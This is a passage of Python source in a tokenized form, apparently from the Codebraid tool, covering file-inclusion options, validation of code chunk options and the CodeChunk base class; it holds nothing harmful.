"file"')<block_end><if_stmt>code_chunk.source_errors<block_start><return><block_end>file_path=pathlib.Path(file).expanduser()<try_stmt><block_start>text=file_path.read_text(encoding=encoding)<block_end><except_stmt>FileNotFoundError<block_start>code_chunk.source_errors.append('Cannot include nonexistent file "{0}"'.format(file))<block_end><except_stmt>LookupError<block_start>code_chunk.source_errors.append('Unknown encoding "{0}"'.format(encoding))<block_end><except_stmt>PermissionError<block_start>code_chunk.source_errors.append('Insufficient permissions to access file "{0}"'.format(file))<block_end><except_stmt>UnicodeDecodeError<block_start>code_chunk.source_errors.append('Cannot decode file "{0}" with encoding "{1}"'.format(file encoding))<block_end><if_stmt>code_chunk.source_errors<block_start><return><block_end>selection_keywords=start_keywords+end_keywords+range_keywords<if_stmt>selection_keywords<block_start><for_stmt>kw selection_keywords<block_start>text=getattr(self '_option_'+kw)(include_options[kw] text)<if_stmt>code_chunk.source_errors<block_start><return><block_end><block_end><block_end>code_lines=util.splitlines_lf(text)<line_sep>self.code_lines=code_lines<line_sep>self.update(include_options)<block_end>keywords=set(['file' 'encoding' 'lines' 'regex' 'start_string' 'start_regex' 'after_string' 'after_regex' 'before_string' 'before_regex' 'end_string' 'end_regex'])<line_sep>_start_keywords=set(['start_string' 'start_regex' 'after_string' 'after_regex'])<line_sep>_end_keywords=set(['before_string' 'before_regex' 'end_string' 'end_regex'])<line_sep>_range_keywords=set(['lines' 'regex'])<line_sep>_selection_keywords=_start_keywords|_end_keywords|_range_keywords<def_stmt>_option_lines self value text pattern_re=re.compile(r'{n}(?:-(?:{n})?)?(?:,{n}(?:-(?:{n})?)?)*\Z'.format(n='[1-9][0-9]*'))<block_start>value=value.replace(' ' '')<if_stmt><not>pattern_re.match(value)<block_start>self.code_chunk.source_errors.append('Invalid value for "include" option "lines"')<line_sep><return><block_end>max_line_number=text.count('\n')<if_stmt>text[-1:]<ne>'\n'<block_start>max_line_number<augadd>1<block_end>include_line_indices=set()<for_stmt>line_range value.split(',')<block_start><if_stmt>'-'<not><in>line_range<block_start>include_line_indices.add(int(line_range)-1)<block_end><else_stmt><block_start>start,end=line_range.split('-')<line_sep>start=int(start)-1<line_sep>end=int(end)<if>end<else>max_line_number<line_sep>include_line_indices.update(range(start end))<block_end><block_end>text_lines=util.splitlines_lf(text)<line_sep><return>'\n'.join(text_lines[n]<for>n sorted(include_line_indices))<block_end><def_stmt>_option_regex self value text<block_start><try_stmt><block_start>pattern_re=re.compile(value re.MULTILINE|re.DOTALL)<block_end><except_stmt>re.error<block_start>self.code_chunk.source_errors.append('Invalid regex pattern for "include" option "regex"')<line_sep><return><block_end>match=pattern_re.search(text)<if_stmt>match<is><none><block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "regex" was not found')<line_sep><return><block_end><return>match.group()<block_end><def_stmt>_option_start_string self value text<block_start>index=text.find(value)<if_stmt>index<l>0<block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "start_string" was not found')<line_sep><return><block_end><return>text[index:]<block_end><def_stmt>_option_start_regex self value text<block_start><try_stmt><block_start>pattern_re=re.compile(value re.MULTILINE|re.DOTALL)<block_end><except_stmt>re.error<block_start>self.code_chunk.source_errors.append('Invalid regex pattern for "include" option "start_regex"')<line_sep><return><block_end>match=pattern_re.search(text)<if_stmt>match<is><none><block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "start_regex" was not found')<line_sep><return><block_end><return>text[match.start():]<block_end><def_stmt>_option_after_string self value text<block_start>index=text.find(value)<if_stmt>index<l>0<block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "after_string" was not found')<line_sep><return><block_end><return>text[index+len(value):]<block_end><def_stmt>_option_after_regex self value text<block_start><try_stmt><block_start>pattern_re=re.compile(value re.MULTILINE|re.DOTALL)<block_end><except_stmt>re.error<block_start>self.code_chunk.source_errors.append('Invalid regex pattern for "include" option "after_regex"')<line_sep><return><block_end>match=pattern_re.search(text)<if_stmt>match<is><none><block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "after_regex" was not found')<line_sep><return><block_end><return>text[match.end():]<block_end><def_stmt>_option_before_string self value text<block_start>index=text.find(value)<if_stmt>index<l>0<block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "before_string" was not found')<line_sep><return><block_end><return>text[:index]<block_end><def_stmt>_option_before_regex self value text<block_start><try_stmt><block_start>pattern_re=re.compile(value re.MULTILINE|re.DOTALL)<block_end><except_stmt>re.error<block_start>self.code_chunk.source_errors.append('Invalid regex pattern for "include" option "before_regex"')<line_sep><return><block_end>match=pattern_re.search(text)<if_stmt>match<is><none><block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "before_regex" was not found')<line_sep><return><block_end><return>text[:match.start()]<block_end><def_stmt>_option_end_string self value text<block_start>index=text.find(value)<if_stmt>index<l>0<block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "end_string" was not found')<line_sep><return><block_end><return>text[:index+len(value)]<block_end><def_stmt>_option_end_regex self value text<block_start><try_stmt><block_start>pattern_re=re.compile(value re.MULTILINE|re.DOTALL)<block_end><except_stmt>re.error<block_start>self.code_chunk.source_errors.append('Invalid regex pattern for "include" option "end_regex"')<line_sep><return><block_end>match=pattern_re.search(text)<if_stmt>match<is><none><block_start>self.code_chunk.source_errors.append('The pattern given by "include" option "end_regex" was not found')<line_sep><return><block_end><return>text[:match.end()]<block_end><block_end><class_stmt>Options(dict)<block_start>''' Store code chunk options. Also modify the code chunk as necessary based on the options. Option processing methods check options for validity and process them, but do not perform any type conversions. Any desired type conversions must be performed in format-specific subclasses of CodeChunk, which can take into account the data types that a given document format allows for options. Subclasses must also handle duplicate options, since at this point options must have been reduced to a dict. The effect of all options is independent of their order. When two options would have an order-dependent effect, only one of them is permitted at a time. Invalid options related to presentation result in warnings, while invalid options related to code execution result in errors. When possible, option processing proceeds even after an error, to give a more complete error message. There are two approaches to handling errors: Stop all code execution, or stop all code execution related to the error. The latter approach is currently taken. Processing as many options as possible makes it easier to determine which code execution is related to an error. For example, if the session option is processed for a code chunk with an error, then only that session can be disabled, instead of the entire language related to the error. '''<def_stmt>__init__ self code_chunk custom_options<block_start>self.code_chunk=code_chunk<if_stmt>code_chunk.inline<block_start>self.update(self._default_inline_options)<block_end><else_stmt><block_start>self.update(self._default_block_options)<block_end><if_stmt>code_chunk.execute<block_start>self['session']=<none><block_end><else_stmt><block_start>self['source']=<none><block_end>self['first_chunk_options']={}<if_stmt>any(k<not><in>self.keywords<for>k custom_options)<block_start>unknown_keys=', '.join('"{0}"'.format(k)<for>k custom_options<if>k<not><in>self.keywords)<line_sep># Raise an error for unknown options. There is no way to tell # whether an execution or presentation option was intended, so # take the safer approach. code_chunk.source_errors.append('Unknown keywords: {0}'.format(unknown_keys))<line_sep># Treat received `custom_options` as immutable custom_options={k:v<for>k,v custom_options.items()<if>k<in>self.keywords}<block_end>self.custom_options=custom_options<for_stmt>k,v custom_options.items()<block_start><if_stmt>k<not><in>self._after_copy_keywords<block_start>getattr(self '_option_'+k)(k v)<block_end><block_end><if_stmt><not>code_chunk.source_errors<and>'copy'<not><in>self# Only handle 'show' and 'hide' if there are no errors so far and # there is not a pending 'copy', which for some commands might # change `.is_expr` or the defaults for 'show'. If there are # errors, 'show' and 'hide' are never used. <block_start><if_stmt>code_chunk.inline<block_start>self['show']=self._default_inline_show[code_chunk.command].copy()<block_end><else_stmt><block_start>self['show']=self._default_block_show[code_chunk.command].copy()<block_end><for_stmt>k,v custom_options.items()<block_start><if_stmt>k<in>self._after_copy_keywords<block_start>getattr(self '_option_'+k)(k v)<block_end><block_end><block_end><block_end><def_stmt>finalize_after_copy self<block_start>''' Complete any option processing that must wait until after copying. For the paste command, 'show' can be inherited. For paste and code, `.is_expr` can be inherited. 'lang' can also be inherited. '''<line_sep>code_chunk=self.code_chunk<line_sep>custom_options=self.custom_options<if_stmt>self['lang']<is><none><block_start>self['lang']=code_chunk.copy_chunks[0].options['lang']<block_end><if_stmt>code_chunk.inline<block_start><if_stmt>code_chunk.command<eq>'paste'<and>'show'<not><in>custom_options<block_start>self['show']=code_chunk.copy_chunks[0].options['show'].copy()# Inherit <block_end><else_stmt><block_start>self['show']=self._default_inline_show[code_chunk.command].copy()<block_end><block_end><else_stmt><block_start><if_stmt>code_chunk.command<eq>'paste'<and>'show'<not><in>custom_options<block_start>self['show']=code_chunk.copy_chunks[0].options['show'].copy()# Inherit <block_end><else_stmt><block_start>self['show']=self._default_block_show[code_chunk.command].copy()<block_end><block_end><for_stmt>key self._after_copy_keywords<block_start><if_stmt>key<in>custom_options<block_start>getattr(self '_option_'+key)(key custom_options[key])<block_end><block_end><block_end>_base_keywords=set(['complete' 'copy' 'example' 'hide' 'hide_markup_keys' 'include' 'lang' 'name' 'outside_main' 'session' 'source' 'show'])<line_sep>_layout_keywords=set(['{0}_{1}'.format(dsp kw)<if>dsp<else>kw<for>dsp ('' 'markup' 'copied_markup' 'code' 'stdout' 'stderr')<for>kw ('first_number' 'line_numbers' 'rewrap_lines' 'rewrap_width' 'expand_tabs' 'tab_size')])<line_sep>_first_chunk_execute_keywords=set(['executable' 'jupyter_kernel'])<line_sep>_first_chunk_save_keywords=set(['save' 'save_as'])<line_sep>_first_chunk_other_keywords=set(['jupyter_timeout' 'live_output'])<line_sep>_first_chunk_keywords=_first_chunk_execute_keywords|_first_chunk_save_keywords|_first_chunk_other_keywords<line_sep>keywords=_base_keywords|_layout_keywords|_first_chunk_keywords<line_sep>_after_copy_keywords=set(['hide' 'show'])<line_sep># Default values for show and session/source are inserted later based on # command and inline status _default_inline_options={'complete':<true> 'example':<false> 'lang':<none> 'outside_main':<false>}<line_sep>_default_block_options=_default_inline_options.copy()<line_sep>_default_block_options.update({'code_first_number':'next' 'code_line_numbers':<true>})<line_sep># The defaultdict handles unknown commands that are represented as None _default_rich_output='latex|markdown|png|jpg|plain'.split('|')<line_sep>_default_inline_show=collections.defaultdict(<lambda>:ODict() # Unknown -> show nothing {'code':ODict([('code' 'verbatim')]) 'expr':ODict([('expr' 'raw') ('stderr' 'verbatim')]) # expr and rich_output don't clash, because expr is only present # with the built-in code execution system, while rich_output # requires a Jupyter kernel. If the built-in system gains # rich_output capabilities or there are other related changes, # this may need refactoring. 'nb':ODict([('expr' 'verbatim') ('rich_output' _default_rich_output) ('stderr' 'verbatim')]) 'paste':ODict() 'run':ODict([('stdout' 'raw') ('stderr' 'verbatim') ('rich_output' _default_rich_output)])})<line_sep>_default_block_show=collections.defaultdict(<lambda>:ODict() # Unknown -> show nothing {'code':ODict([('code' 'verbatim')]) 'nb':ODict([('code' 'verbatim') ('stdout' 'verbatim') ('stderr' 'verbatim') ('rich_output' _default_rich_output)]) 'paste':ODict() 'repl':ODict([('repl' 'verbatim')]) 'run':ODict([('stdout' 'raw') ('stderr' 'verbatim') ('rich_output' _default_rich_output)])})<def_stmt>_option_bool_warning self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_bool_error self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_str_warning self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_str_error self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_positive_int_warning self key value<block_start><if_stmt><not>isinstance(value int)<or>value<le>0<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_positive_int_error self key value<block_start><if_stmt><not>isinstance(value int)<or>value<le>0<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_first_chunk_bool_error self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self['first_chunk_options'][key]=value<block_end><block_end><def_stmt>_option_first_chunk_string_error self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>first_chunk_options=self['first_chunk_options']<if_stmt>(key<in>self._first_chunk_execute_keywords<and>any(k<in>first_chunk_options<for>k self._first_chunk_execute_keywords))<block_start>conflicting_options=', '.join('"{0}"'.format(k)<for>k self._first_chunk_execute_keywords<if>k<in>first_chunk_options)<line_sep>self.code_chunk.source_errors.append('Conflicting options: {0}'.format(conflicting_options))<block_end><else_stmt><block_start>first_chunk_options[key]=value<block_end><block_end><block_end><def_stmt>_option_first_chunk_int_warning self key value<block_start><if_stmt><not>isinstance(value int)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start>self['first_chunk_options'][key]=value<block_end><block_end>_option_executable=_option_first_chunk_string_error<line_sep>_option_jupyter_kernel=_option_first_chunk_string_error<line_sep>_option_jupyter_timeout=_option_first_chunk_int_warning<line_sep>_option_save=_option_first_chunk_bool_error<line_sep>_option_save_as=_option_first_chunk_string_error<line_sep>_option_live_output=_option_first_chunk_bool_error<line_sep>_option_example=_option_bool_warning<line_sep>_option_lang=_option_str_error<def_stmt>_option_complete self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt><not>self.code_chunk.execute<block_start>self.code_chunk.source_errors.append('Option "complete" is only compatible with executed code chunks')<block_end><elif_stmt>self.code_chunk.command<eq>'repl'<block_start>self.code_chunk.source_errors.append('Option "complete" is not compatible with "repl" command')<block_end><elif_stmt>self.code_chunk.is_expr<and><not>value<block_start>self.code_chunk.source_errors.append('Option "complete" value "false" is incompatible with expr command')<block_end><elif_stmt>self['outside_main']# Technically, this is only required for complete=true, but # prohibiting it in all cases is more consistent <block_start>self.code_chunk.source_errors.append('Option "complete" is incompatible with "outside_main" value "true"')<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_copy self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt>'include'<in>self<block_start>self.code_chunk.source_errors.append('Option "copy" is incompatible with "include"')<block_end><else_stmt># Since non-identifier code chunk names can't be defined, there's # no need to check for identifier-style names here <block_start>self[key]=[x.strip()<for>x value.split('+')]<block_end><block_end><def_stmt>_option_expand_tabs self key value<block_start><if_stmt>key<eq>'expand_tabs'<block_start>key='code_expand_tabs'<block_end>self._option_bool_warning(key value)<block_end>_option_markup_expand_tabs=_option_expand_tabs<line_sep>_option_copied_markup_expand_tabs=_option_expand_tabs<line_sep>_option_code_expand_tabs=_option_expand_tabs<line_sep>_option_stdout_expand_tabs=_option_expand_tabs<line_sep>_option_stderr_expand_tabs=_option_expand_tabs<def_stmt>_option_first_number self key value<block_start><if_stmt><not>((isinstance(value int)<and>value<g>0)<or>(isinstance(value str)<and>value<eq>'next'))<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start><if_stmt>key<eq>'first_number'<block_start>key='code_first_number'<block_end>self[key]=value<block_end><block_end>_option_markup_first_number=_option_first_number<line_sep>_option_copied_markup_first_number=_option_first_number<line_sep>_option_code_first_number=_option_first_number<line_sep>_option_stdout_first_number=_option_first_number<line_sep>_option_stderr_first_number=_option_first_number<def_stmt>_option_rewrap_lines self key value<block_start><if_stmt>key<eq>'rewrap_lines'<block_start>key='code_rewrap_lines'<block_end>self._option_bool_warning(key value)<block_end>_option_markup_rewrap_lines=_option_rewrap_lines<line_sep>_option_copied_markup_rewrap_lines=_option_rewrap_lines<line_sep>_option_code_rewrap_lines=_option_rewrap_lines<line_sep>_option_stdout_rewrap_lines=_option_rewrap_lines<line_sep>_option_stderr_rewrap_lines=_option_rewrap_lines<def_stmt>_option_rewrap_width self key value<block_start><if_stmt>key<eq>'rewrap_width'<block_start>key='code_rewrap_width'<block_end>self._option_positive_int_warning(key value)<block_end>_option_markup_rewrap_width=_option_rewrap_width<line_sep>_option_copied_markup_rewrap_width=_option_rewrap_width<line_sep>_option_code_rewrap_width=_option_rewrap_width<line_sep>_option_stdout_rewrap_width=_option_rewrap_width<line_sep>_option_stderr_rewrap_width=_option_rewrap_width<def_stmt>_option_hide self key value display_values=set(['markup' 'copied_markup' 'code' 'stdout' 'stderr' 'expr' 'rich_output'])# 'hide' may be processed during `finalize_after_copy()` to allow for # 'show' and `.is_expr` inheritance. <block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt>'show'<in>self.custom_options# 'hide' checks for 'show' conflict, so 'show' does not. Check # in `custom_options` since there's a default 'show' in `self`. <block_start>self.code_chunk.source_warnings.append('Option "hide" cannot be used with "show"')<block_end><elif_stmt>value<eq>'all'<block_start>self['show']=ODict()<block_end><else_stmt><block_start>hide_values=value.replace(' ' '').split('+')<if_stmt><not>all(v<in>display_values<for>v hide_values)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start><for_stmt>v hide_values<block_start>self['show'].pop(v <none>)<block_end><block_end><block_end><block_end><def_stmt>_option_hide_markup_keys self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt># No need to check keys for validity; this is a display option. <block_start>hide_keys=set(value.replace(' ' '').split('+'))<line_sep>hide_keys.add('hide_markup_keys')<line_sep>self[key]=hide_keys<block_end><block_end><def_stmt>_option_include self key value# Include() does its own value check, so this isn't technically needed <block_start><if_stmt><not>isinstance(value dict)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt>'copy'<in>self<block_start>self.code_chunk.source_errors.append('Option "include" is incompatible with "copy"')<block_end><else_stmt><block_start>include=Include(self.code_chunk value)<if_stmt>include.code_lines<is><not><none><block_start>self[key]=include<block_end><block_end><block_end><def_stmt>_option_line_numbers self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><else_stmt><block_start><if_stmt>key<eq>'line_numbers'<block_start>key='code_line_numbers'<block_end>self[key]=value<block_end><block_end>_option_markup_line_numbers=_option_line_numbers<line_sep>_option_copied_markup_line_numbers=_option_line_numbers<line_sep>_option_code_line_numbers=_option_line_numbers<line_sep>_option_stdout_line_numbers=_option_line_numbers<line_sep>_option_stderr_line_numbers=_option_line_numbers<def_stmt>_option_name self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt><not>value.isidentifier()<block_start>self.code_chunk.source_warnings.append('Option "{0}" has invalid, non-identifier value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_outside_main self key value<block_start><if_stmt><not>isinstance(value bool)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt><not>self.code_chunk.execute<block_start>self.code_chunk.source_errors.append('Option "outside_main" is only compatible with executed code chunks')<block_end><elif_stmt>self.code_chunk.command<eq>'repl'<block_start>self.code_chunk.source_errors.append('Option "outside_main" is not compatible with "repl" command')<block_end><elif_stmt>self.code_chunk.is_expr<and>value<block_start>self.code_chunk.source_errors.append('Option "outside_main" value "true" is incompatible with expr command')<block_end><elif_stmt>value<and>'complete'<in>self.custom_options<block_start>self.code_chunk.source_errors.append('Option "outside_main" value "true" is incompatible with "complete"')<block_end><else_stmt><block_start>self['complete']=<false><line_sep>self[key]=value<block_end><block_end><def_stmt>_option_source self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt>self.code_chunk.execute<and>self.code_chunk.command<is><not><none># Always preserve sources for unknown commands, so that these # sources can be marked as having potential errors later <block_start>self.code_chunk.source_errors.append('Option "source" is only compatible with non-executed code chunks; otherwise, use "session"')<block_end><elif_stmt><not>value.isidentifier()<block_start>self.code_chunk.source_errors.append('Option "{0}" has invalid, non-identifier value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end><def_stmt>_option_session self key value<block_start><if_stmt><not>isinstance(value str)<block_start>self.code_chunk.source_errors.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt><not>self.code_chunk.execute<and>self.code_chunk.command<is><not><none># Always preserve sessions for unknown commands, so that these # sessions can be marked as having potential errors later <block_start>self.code_chunk.source_errors.append('Option "session" is only compatible with executed code chunks; otherwise, use "source"')<block_end><elif_stmt><not>value.isidentifier()<block_start>self.code_chunk.source_errors.append('Option "{0}" has invalid, non-identifier value "{1}"'.format(key value))<block_end><else_stmt><block_start>self[key]=value<block_end><block_end>mime_map={'latex':'text/latex' 'html':'text/html' 'markdown':'text/markdown' 'plain':'text/plain' 'png':'image/png' 'jpg':'image/jpeg' 'jpeg':'image/jpeg' 'svg':'image/svg+xml' 'pdf':'application/pdf'}<line_sep>mime_map_with_text_display={}<line_sep>rich_text_default_display={}<for_stmt>k,v mime_map.items()<block_start>mime_map_with_text_display[k]=v<if_stmt>v.startswith('text/')<block_start>mime_map_with_text_display[k+':raw']=v<line_sep>mime_map_with_text_display[k+':verbatim']=v<line_sep>mime_map_with_text_display[k+':verbatim_or_empty']=v<if_stmt>k<eq>'plain'<block_start>rich_text_default_display[k]='verbatim'<block_end><else_stmt><block_start>rich_text_default_display[k]='raw'<block_end><block_end><block_end><def_stmt>_option_show self key value# 'show' may be processed during `finalize_after_copy()` to allow for # 'show' and `.is_expr` inheritance. 'hide' checks for 'show' # conflict, so 'show' does not. <block_start><if_stmt><not>(isinstance(value str)<or>value<is><none>)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" value "{1}"'.format(key value))<block_end><elif_stmt>value<in>('none' <none>)<block_start>self[key]=ODict()<block_end><else_stmt><block_start>value_processed=ODict()<for_stmt>output_and_format value.replace(' ' '').split('+')<block_start><if_stmt>':'<not><in>output_and_format<block_start>output=output_and_format<line_sep>format=<none><block_end><else_stmt><block_start>output,format=output_and_format.split(':' 1)<block_end><if_stmt>output<in>value_processed<block_start>self.code_chunk.source_warnings.append('Option "{0}" value "{1}" contains duplicate "{2}"'.format(key value output))<line_sep><continue><block_end><if_stmt>output<in>('markup' 'copied_markup' 'code' 'repl')<block_start><if_stmt>format<is><none><block_start>format='verbatim'<block_end><elif_stmt>format<ne>'verbatim'<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end><if_stmt>output<eq>'copied_markup'<and>'copy'<not><in>self.custom_options<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"; can only be used with "copy"'.format(key output_and_format))<line_sep><continue><block_end><block_end><elif_stmt>output<in>('stdout' 'stderr')<block_start><if_stmt>format<is><none><block_start>format='verbatim'<block_end><elif_stmt>format<not><in>('verbatim' 'verbatim_or_empty' 'raw')<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end><block_end><elif_stmt>output<eq>'expr'<block_start><if_stmt><not>self.code_chunk.is_expr<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end><if_stmt>format<is><none><block_start>format='raw'<block_end><elif_stmt>format<not><in>('verbatim' 'verbatim_or_empty' 'raw')<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end><block_end><elif_stmt>output<eq>'rich_output'<block_start><if_stmt>format<is><none><block_start>format=self._default_rich_output<block_end><else_stmt><block_start>format=format.split('|')<if_stmt><not>all(fmt<in>self.mime_map_with_text_display<for>fmt format)<block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end><block_end><block_end><else_stmt><block_start>self.code_chunk.source_warnings.append('Invalid "{0}" sub-value "{1}"'.format(key output_and_format))<line_sep><continue><block_end>value_processed[output]=format<block_end>self[key]=value_processed<block_end><block_end><def_stmt>_option_tab_size self key value<block_start><if_stmt>key<eq>'tab_size'<block_start>key='code_tab_size'<block_end>self._option_positive_int_warning(key value)<block_end>_option_markup_tab_size=_option_tab_size<line_sep>_option_copied_markup_tab_size=_option_tab_size<line_sep>_option_code_tab_size=_option_tab_size<line_sep>_option_stdout_tab_size=_option_tab_size<line_sep>_option_stderr_tab_size=_option_tab_size<block_end><class_stmt>CodeChunk(object)<block_start>''' Base class for code chunks. '''<def_stmt>__init__ self command:str code:Union[str List[str]] custom_options:dict * source_name:Optional[str]=<none> source_start_line_number:Optional[int]=<none> inline:Optional[bool]=<none><block_start>self.__pre_init__()<if_stmt>command<not><in>self.commands<block_start><if_stmt>command<is><none><block_start>self.source_errors.append('Missing valid Codebraid command')<block_end><else_stmt><block_start>self.source_errors.append('Unknown Codebraid command "{0}"'.format(command))<block_end>self.command=<none><block_end><else_stmt><block_start>self.command=command<block_end><if_stmt>command<eq>'expr'<and><not>inline<block_start>self.source_errors.append('Codebraid command "{0}" is only allowed inline'.format(command))<block_end><if_stmt>command<eq>'repl'<and>inline<block_start>self.source_errors.append('Codebraid command "{0}" is not supported inline'.format(command))<block_end>self.execute=self._default_execute[command]<if_stmt>command<eq>'expr'<or>(inline<and>command<eq>'nb')<block_start>self.is_expr=<true><block_end><else_stmt># For the paste command, or code with 'copy', this value can # change later due to inheritance <block_start>self.is_expr=<false><block_end>self.source_name=source_name<line_sep>self.source_start_line_number=source_start_line_number<line_sep>self.inline=inline<line_sep># Check for len(code_lines) > 1 for inline later self._code=<none><if_stmt>isinstance(code list)<block_start>code_lines=code<block_end><else_stmt><block_start>code_lines=util.splitlines_lf(code)<or>['']<block_end><if_stmt>'copy'<not><in>custom_options<and>'include'<not><in>custom_options<block_start><if_stmt>inline<and>len(code_lines)<g>1<block_start>self.source_errors.append('Inline code cannot be longer that 1 line')<block_end>self.code_lines=code_lines<line_sep>self.placeholder_code_lines=<none><block_end><else_stmt><block_start><if_stmt>inline<block_start><if_stmt>len(code_lines)<g>1<or>code_lines[0]<not><in>('' ' ' '_')<block_start>self.source_errors.append('Invalid placeholder code for copy or include (need space or underscore)')<block_end><block_end><elif_stmt>len(code_lines)<g>1<or>code_lines[0].rstrip(' ')<not><in>('' '_')<block_start>self.source_errors.append('Invalid placeholder code for copy or include (need empty, space, or underscore)')<block_end># Copying or including code could result in more than one line of # code in an inline context. That is only an issue if the code is # actually displayed. This is checked later when code is # included/copied. self.placeholder_code_lines=code_lines<line_sep>self.code_lines=<none><block_end>self.options=Options(self custom_options)<if_stmt>'include'<in>self.options<and><not>self.source_errors# Copy over include only if no source errors -- otherwise it isn't # used and 'show' may not exist <block_start>include=self.options['include']<if_stmt>inline<and>'code'<in>self.options['show']<and>len(include.code_lines)<g>1<block_start>self.source_errors.append('Cannot include and then display multiple lines of code in an inline context')<block_end><else_stmt><block_start>self.code_lines=include.code_lines<block_end><block_end><if_stmt>command<eq>'paste'<block_start><if_stmt>'copy'<not><in>custom_options<block_start>self.source_errors.append('Command "paste" cannot be used without specifying a target via "copy"')<block_end>self.has_output=<false><block_end><else_stmt><block_start>self.has_output=<true># Whether need output from copying <block_end><if_stmt>'copy'<in>self.options<block_start>self.copy_chunks=[]<block_end><if_stmt>self.execute<block_start>self.session_obj=<none><line_sep>self.session_index=<none><line_sep>self.session_output_index=<none><block_end><else_stmt><block_start>self.source_obj=<none><line_sep>self.source_index=<none><block_end>self.stdout_lines=<none><line_sep>self.stderr_lines=<none><line_sep>self.repl_lines=<none><line_sep>self.rich_output=<none><if_stmt>self.is_expr<block_start>self.expr_lines=<none><block_end>self.markup_start_line_number=<none><line_sep>self.code_start_line_number=<none><line_sep>self.stdout_start_line_number=<none><line_sep>self.stderr_start_line_number=<none><block_end><def_stmt>__pre_init__ self<block_start>''' Create lists of errors and warnings. Subclasses may need to register errors or warnings during preprocessing, before they are ready for `super().__init__()` '''<if_stmt><not>hasattr(self 'source_errors')<block_start>self.source_errors=[]<line_sep>self.runtime_source_error=<false><line_sep>self.source_warnings=[]<block_end><block_end>commands=set(['code' 'expr' 'nb' 'paste' 'repl' 'run'])<line_sep>_default_execute=collections.defaultdict(<lambda>:<false> # Unknown command -> do not run {k:<true><for>k ('expr' 'nb' 'repl' 'run')})<line_sep>@property<def_stmt>code self<block_start>code=self._code<if_stmt>code<is><not><none><block_start><return>code<block_end>code='\n'.join(self.code_lines)<line_sep>self._code=code<line_sep><return>code<block_end><def_stmt>finalize_after_copy self<block_start>''' Finalize options. This can be redefined by subclasses so that they can modify themselves based on inherited 'lang' or 'show'. '''<line_sep>self.options.finalize_after_copy()<block_end><def_stmt>copy_code self<block_start>''' Copy code for 'copy' option. Code is copied before execution, which is more flexible. Output (stdout, stderr, expr) must be copied separately after execution. This should only be invoked for a code chunk with no source errors, with copy targets that all exist and have no source errors. 